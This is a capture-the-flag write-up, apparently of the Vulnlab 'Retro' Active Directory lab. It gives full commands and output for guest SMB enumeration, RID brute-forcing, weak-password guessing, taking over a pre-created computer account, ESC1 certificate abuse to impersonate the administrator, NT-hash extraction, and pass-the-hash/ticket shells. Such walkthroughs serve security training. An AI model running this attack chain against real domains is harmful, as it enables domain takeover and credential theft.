Retro
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
| └─$ rustscan -a 10.10.83.151 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.83.151:53
Open 10.10.83.151:88
Open 10.10.83.151:135
Open 10.10.83.151:139
Open 10.10.83.151:389
Open 10.10.83.151:445
Open 10.10.83.151:464
Open 10.10.83.151:593
Open 10.10.83.151:636
Open 10.10.83.151:3268
Open 10.10.83.151:3269
Open 10.10.83.151:3389
Open 10.10.83.151:9389
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-11 19:59 +05
Initiating Ping Scan at 19:59
Scanning 10.10.83.151 [4 ports]
Completed Ping Scan at 19:59, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:59
Completed Parallel DNS resolution of 1 host. at 19:59, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:59
Scanning 10.10.83.151 [13 ports]
Discovered open port 3389/tcp on 10.10.83.151
Discovered open port 445/tcp on 10.10.83.151
Discovered open port 135/tcp on 10.10.83.151
Discovered open port 53/tcp on 10.10.83.151
Discovered open port 139/tcp on 10.10.83.151
Discovered open port 3268/tcp on 10.10.83.151
Discovered open port 464/tcp on 10.10.83.151
Discovered open port 9389/tcp on 10.10.83.151
Discovered open port 88/tcp on 10.10.83.151
Discovered open port 636/tcp on 10.10.83.151
Discovered open port 389/tcp on 10.10.83.151
Discovered open port 593/tcp on 10.10.83.151
Discovered open port 3269/tcp on 10.10.83.151
Completed SYN Stealth Scan at 19:59, 0.20s elapsed (13 total ports)
Nmap scan report for 10.10.83.151
Host is up, received echo-reply ttl 127 (0.092s latency).
Scanned at 2024-12-11 19:59:55 +05 for 0s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
Raw packets sent: 17 (724B) | Rcvd: 14 (600B)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| └─$ nmap -sC -sV -p53,88,139,135,389,445,464,593,636,3268,3269,9389 10.10.83.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-11 20:01 +05
Nmap scan report for 10.10.83.151
Host is up (0.089s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-11 15:00:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-12-11T14:46:48
|_Not valid after: 2025-12-11T14:46:48
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-12-11T14:46:48
|_Not valid after: 2025-12-11T14:46:48
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-12-11T14:46:48
|_Not valid after: 2025-12-11T14:46:48
|_ssl-date: TLS randomness does not represent time
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-12-11T14:46:48
|_Not valid after: 2025-12-11T14:46:48
|_ssl-date: TLS randomness does not represent time
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1m16s
| smb2-time:
| date: 2024-12-11T15:01:00
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.13 seconds
|
Enumerating LDAP shows nothing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| └─$ ldapsearch -x -H ldap://10.10.83.151 -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=retro,DC=vl
namingContexts: CN=Configuration,DC=retro,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=retro,DC=vl
namingContexts: DC=DomainDnsZones,DC=retro,DC=vl
namingContexts: DC=ForestDnsZones,DC=retro,DC=vl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| └─$ ldapsearch -x -H ldap://10.10.83.151 -b 'DC=retro,DC=vl'
# extended LDIF
#
# LDAPv3
# base <DC=retro,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
|
Let’s move to smb. Nothing with Null Authentication, but Guest account seems to be enabled and we can see the shares.
1
2
3
4
| └─$ nxc smb 10.10.83.151 -u '' -p '' --shares
SMB 10.10.83.151 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.83.151 445 DC [+] retro.vl\:
SMB 10.10.83.151 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| └─$ nxc smb 10.10.83.151 -u 'guest' -p '' --shares
SMB 10.10.83.151 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.83.151 445 DC [+] retro.vl\guest:
SMB 10.10.83.151 445 DC [*] Enumerated shares
SMB 10.10.83.151 445 DC Share Permissions Remark
SMB 10.10.83.151 445 DC ----- ----------- ------
SMB 10.10.83.151 445 DC ADMIN$ Remote Admin
SMB 10.10.83.151 445 DC C$ Default share
SMB 10.10.83.151 445 DC IPC$ READ Remote IPC
SMB 10.10.83.151 445 DC NETLOGON Logon server share
SMB 10.10.83.151 445 DC Notes
SMB 10.10.83.151 445 DC SYSVOL Logon server share
SMB 10.10.83.151 445 DC Trainees READ
|
Root
Let’s check Trainees share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| └─$ impacket-smbclient guest@10.10.83.151 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Trainees
# ls
drw-rw-rw- 0 Mon Jul 24 04:16:11 2023 .
drw-rw-rw- 0 Wed Jul 26 15:54:14 2023 ..
-rw-rw-rw- 288 Mon Jul 24 04:16:11 2023 Important.txt
# cat important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
#
|
Information from the note is useful, let’s continue enumeration and do rid bruteforcing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| └─$ nxc smb 10.10.83.151 -u 'guest' -p '' --rid-brute
SMB 10.10.83.151 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.83.151 445 DC [+] retro.vl\guest:
SMB 10.10.83.151 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.83.151 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.10.83.151 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.10.83.151 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.10.83.151 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.10.83.151 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.10.83.151 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.10.83.151 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.10.83.151 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.10.83.151 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.10.83.151 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.10.83.151 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.10.83.151 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.83.151 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.83.151 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.83.151 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.10.83.151 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.10.83.151 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.83.151 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.83.151 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.83.151 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.83.151 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.10.83.151 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.10.83.151 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.83.151 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.10.83.151 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.10.83.151 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.10.83.151 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.10.83.151 445 DC 1109: RETRO\tblack (SidTypeUser)
|
We see trainee account that was mentioned in the note. Since password is not strong/unique, we can try the first guess for a password which is trainee
1
2
3
| └─$ nxc smb 10.10.83.151 -u 'trainee' -p 'trainee'
SMB 10.10.83.151 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.83.151 445 DC [+] retro.vl\trainee:trainee
|
Since now we have creds, we can try enumerating shares again and see what we can access
1
2
3
4
5
6
7
8
9
10
11
12
13
| └─$ nxc smb 10.10.83.151 -u 'trainee' -p 'trainee' --shares
SMB 10.10.83.151 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.83.151 445 DC [+] retro.vl\trainee:trainee
SMB 10.10.83.151 445 DC [*] Enumerated shares
SMB 10.10.83.151 445 DC Share Permissions Remark
SMB 10.10.83.151 445 DC ----- ----------- ------
SMB 10.10.83.151 445 DC ADMIN$ Remote Admin
SMB 10.10.83.151 445 DC C$ Default share
SMB 10.10.83.151 445 DC IPC$ READ Remote IPC
SMB 10.10.83.151 445 DC NETLOGON READ Logon server share
SMB 10.10.83.151 445 DC Notes READ
SMB 10.10.83.151 445 DC SYSVOL READ Logon server share
SMB 10.10.83.151 445 DC Trainees READ
|
We have read access to Notes, let’s check it
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| └─$ impacket-smbclient trainee:trainee@10.10.83.151
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Notes
# ls
drw-rw-rw- 0 Mon Jul 24 04:03:16 2023 .
drw-rw-rw- 0 Wed Jul 26 15:54:14 2023 ..
-rw-rw-rw- 248 Mon Jul 24 04:05:56 2023 ToDo.txt
# cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
#
|
Note mentions pre created computer accounts. Read this blog. Important fact is that when you pre-create computer accounts with the Assign this computer account as a pre-Windows 2000 computer checkmark, the password for the computer account becomes the same as the computer account in lowercase. Blog states that to see STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT response in case the password is correct. We have 2 computer accounts, let’s start with Banking$
1
2
3
4
5
6
7
8
9
10
| ┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.83.151 -u 'Banking$' -p 'banking'
SMB 10.10.83.151 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.83.151 445 DC [-] retro.vl\Banking$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.10.83.151 -u 'Banking$' -p 'INVALID_PASSWORD'
SMB 10.10.83.151 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.83.151 445 DC [-] retro.vl\Banking$:INVALID_PASSWORD STATUS_LOGON_FAILURE
|
We can see that Banking$ is pre created computer account. Now we have change password for us to be able to use it. We can use smbpasswd, ldappasswd, kpasswd, rpcclient. We used impacket’s variant with -p rpc-samr
1
2
3
4
5
6
7
| └─$ impacket-changepasswd 'retro.vl/BANKING$':banking@10.10.83.151 -newpass 'P@ssw0rd!' -dc-ip 10.10.83.151 -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
|
We can now check if ADCS is installed. Note that if bloodhound would find it right away, but we didn’t run it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| └─$ certipy find -u 'BANKING$'@retro.vl -p P@ssw0rd! -dc-ip 10.10.83.151 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
<SNIP>
|
We have ADCS, let’s find vulnerable certificate templates
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| └─$ certipy find -u 'BANKING$'@retro.vl -p P@ssw0rd! -dc-ip 10.10.83.151 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIP>
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
|
We find RetroClients template which is vulnerable to ESC1 and can be requested by Domain Computers. Let’s exploit it.
1
2
3
4
5
6
7
8
9
| └─$ certipy req -u 'BANKING$'@retro.vl -p 'P@ssw0rd!' -dc-ip 10.10.83.151 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 8
Would you like to save the private key? (y/N) n
[-] Failed to request certificate
|
We can’t request the certificate due to CERTSRV_E_KEY_LENGTH error, which means that the public key does not meet the minimum size requirements specified by the template. Checking template info from certipy shows that the minimum size is 4096. Now let’s request again with -key-size 4096 option
1
2
3
4
5
6
7
8
9
| └─$ certipy req -u 'BANKING$'@retro.vl -p 'P@ssw0rd!' -dc-ip 10.10.83.151 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
|
Let’s authenticate using pfx and retrieve administrator’s hash
1
2
3
4
5
6
7
8
9
10
| └─$ certipy auth -pfx administrator.pfx -dc-ip 10.10.83.151
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
|
We can authenticate using hash or using ticket. To authenicate using ticket, we need to add dc.retro.vl and retro.vl records in /etc/hosts
1
2
3
4
5
6
7
8
| └─$ KRB5CCNAME=administrator.ccache impacket-wmiexec -k -no-pass -dc-ip 10.10.83.151 retro.vl/administrator@dc.retro.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
|
1
2
3
4
5
6
7
8
| └─$ impacket-wmiexec -hashes :<REDACTED> retro.vl/administrator@10.10.83.151
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
|
https://api.vulnlab.com/api/v1/share?id=357e9428-1778-410a-be3d-663553d1eb13
